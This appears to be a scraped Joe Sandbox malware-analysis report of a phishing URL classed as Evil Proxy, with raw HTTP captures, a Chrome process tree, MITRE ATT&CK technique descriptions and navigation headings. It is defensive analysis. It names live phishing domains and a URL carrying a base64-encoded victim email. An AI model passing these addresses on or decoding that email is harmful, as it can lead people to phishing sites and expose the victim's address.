2025-01-09 22:30:34 UTC	1249	IN	Data Raw: 34 64 61 0d 0a 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 99 99 99 99 99 99 99 70 03 33 33 33 33 33 33 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa aa aa aa aa aa aa 50 04 ee ee ee ee ee ee ee 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 Data Ascii: 4da"3333333"""""""3333333"""""""3333333p3333333Pfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
2025-01-09 22:30:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:35 UTC	484	OUT	GET /m/ic/1A9TC07ARGDSH4FIUU63X4WA8 HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:35 UTC	247	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:35 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 22:30:35 UTC	7945	IN	Data Raw: 33 65 33 63 0d 0a 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 Data Ascii: 3e3ch(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333
2025-01-09 22:30:35 UTC	7993	IN	Data Raw: 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 Data Ascii: DDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDD
2025-01-09 22:30:35 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:35 UTC	1249	IN	Data Raw: 34 64 61 0d 0a 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 99 99 99 99 99 99 99 70 03 33 33 33 33 33 33 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa aa aa aa aa aa aa 50 04 ee ee ee ee ee ee ee 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 Data Ascii: 4da"3333333"""""""3333333"""""""3333333p3333333Pfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
2025-01-09 22:30:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	17:29:57
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	1
Start time:	17:30:01
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1740 --field-trial-handle=2024,i,7034162612721822103,13615644138870281852,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	17:30:07
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Evil Proxy

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

Windows Analysis Report
http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre